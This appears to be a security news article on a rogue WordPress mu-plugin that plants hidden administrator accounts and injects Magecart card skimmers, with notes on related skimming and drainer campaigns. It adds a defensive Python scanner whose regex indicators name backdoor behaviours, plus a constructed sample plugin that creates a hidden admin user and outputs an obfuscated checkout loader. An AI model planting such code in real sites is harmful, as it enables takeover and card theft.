Risk Alert: Rogue WordPress Plugin Endangers E-commerce Credit Card Data


Threat hunters recently discovered a rogue WordPress plugin that can create fake administrator users and inject malicious JavaScript designed to steal credit card data.

This malicious skimming activity is part of a broader Magecart campaign strategically targeting e-commerce websites, a significant finding highlighted by Sucuri.

Security researcher Ben Martin pointed out, “Similar to other deceptive WordPress plugins, this plugin includes misleading information in its file header to feign authenticity.” The header comment in the code claims the plugin is ‘WordPress Cache Addons.’

Malicious plugins of this kind typically reach a WordPress site either through a compromised administrator account or by exploiting vulnerabilities in other plugins installed on the site.

Once installed, the plugin copies itself into the mu-plugins (must-use plugins) directory, which activates it automatically and hides it from the plugin list in the site’s admin panel.

Martin elaborated, “Since the sole way to eliminate any of the mu-plugins is through manual deletion, the malware takes deliberate measures to prevent this. It does so by unregistering callback functions for hooks that plugins of this nature typically utilize.”

The plugin also offers an option to create an administrator user account and hide it from the site’s legitimate admins, so that the attackers avoid detection and keep access to the site for as long as possible.

The primary objective of the campaign is to inject skimmer code into checkout pages, which captures the card data entered there and sends it to a domain controlled by the attackers.
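A defender-side heuristic scan for the behaviours described above (an added example, not Sucuri’s tooling or the malware itself): it reads each PHP file under wp-content/mu-plugins, extracts the declared plugin name, and flags the hook-unregistering, admin-user creation, checkout-page hooking and obfuscation patterns. The function and hook names are real WordPress/WooCommerce APIs; the indicator set and the two sample plugin sources are this example’s own constructions.

```python
import re
from pathlib import Path

# Heuristics for the behaviours described above (indicator set is assumed):
# unregistering hook callbacks to block cleanup, creating an administrator
# user, hooking the checkout page, obfuscated payloads, remote script loads.
INDICATORS = {
    "unregisters_hooks": re.compile(r"\bremove_(all_)?(action|filter)s?\s*\("),
    "creates_user": re.compile(r"\b(wp_create_user|wp_insert_user)\s*\("),
    "grants_admin": re.compile(r"\b(set_role|add_role)\s*\(\s*['\"]administrator['\"]"),
    "checkout_page": re.compile(r"\bis_checkout\s*\("),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13|eval)\s*\("),
    "remote_script": re.compile(r"<script[^>]+src\s*=\s*['\"]https?://", re.I),
}
HEADER_RE = re.compile(r"^[\s/*#]*Plugin Name:\s*(.+?)\s*(?:\*/)?\s*$", re.M)

def scan_source(src: str) -> dict:
    """Return the declared plugin name and the indicators that matched."""
    m = HEADER_RE.search(src)
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    return {"plugin_name": m.group(1) if m else None, "indicators": hits}

def scan_mu_plugins(mu_dir: Path) -> list:
    """Scan every .php file under wp-content/mu-plugins; keep files with hits."""
    findings = []
    for php in sorted(mu_dir.rglob("*.php")):
        result = scan_source(php.read_text(errors="replace"))
        if result["indicators"]:
            result["file"] = str(php.relative_to(mu_dir))
            findings.append(result)
    return findings

# Constructed samples mirroring the described behaviour (not the real malware).
SAMPLE_ROGUE = """<?php
/* Plugin Name: WordPress Cache Addons */
add_action('init', function () {
    remove_action('admin_init', 'cleanup_callback');        // block removal
    $uid = wp_create_user('svc_cache', 'p@ss', 'x@example.invalid');
    (new WP_User($uid))->set_role('administrator');         // hidden admin
});
add_action('wp_footer', function () {
    if (is_checkout()) echo base64_decode('PHNjcmlwdD4=');  // skimmer loader
});
"""
SAMPLE_BENIGN = """<?php
/* Plugin Name: Maintenance Notice */
add_action('admin_notices', function () { echo '<p>Window: Sunday 02:00</p>'; });
"""
```

Run `scan_mu_plugins(Path("/var/www/html/wp-content/mu-plugins"))` on a live site; any file with hits deserves manual review, and a match on `creates_user` plus `grants_admin` should be checked against the wp_users table directly rather than the admin panel’s user list.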

Martin emphasized, “Considering numerous WordPress infections stem from compromised wp-admin administrator users, it’s plausible they’ve been constrained by their access levels. The ability to install plugins remains a significant capability possessed by WordPress admins.”

This disclosure follows recent alerts within the WordPress security community about a phishing campaign that misleads users about an unrelated security flaw and pressures them into installing a fake plugin disguised as a security patch. Once installed, that plugin creates an admin user and deploys a web shell for persistent remote access.

Sucuri reported that the threat actors behind this campaign are abusing the “RESERVED” status of a CVE identifier, the state in which an ID has been allocated but its details have not yet been published.

Moreover, Sucuri identified another Magecart campaign utilizing the WebSocket communications protocol to inject skimmer code into online storefronts. This nefarious malware activates upon clicking a counterfeit “Complete Order” button overlaid atop the genuine checkout button.

Europol’s recent spotlight report on online fraud underscored digital skimming as a persistent threat, leading to the theft, resale, and misuse of credit card data. The report highlighted a shift from front-end to back-end malware in digital skimming, rendering detection more challenging.

Europol also notified 443 online merchants of compromised credit card or payment card data due to skimming attacks.

Group-IB, collaborating with Europol, identified 23 families of JS-sniffers, including ATMZOW, health_check, FirstKiss, FakeGA, AngryBeaver, Inter, and R3nin, deployed against companies in 17 countries across Europe and the Americas.

The Singapore-based firm added, “As of the end of 2023, a total of 132 JS-sniffer families are known to have compromised websites worldwide.”

Additionally, fake advertisements on Google Search and Twitter for cryptocurrency platforms have been detected, promoting a cryptocurrency drainer named MS Drainer. This drainer has reportedly stolen $58.98 million from 63,210 victims since March 2023 via a network of 10,072 phishing websites.

“By targeting specific audiences through Google search terms and a following base of X, they can select specific targets and launch continuous phishing campaigns at a very low cost,” as stated by ScamSniffer.

Last modified: 2023-12-22T18:58:25+01:00 by puma1973a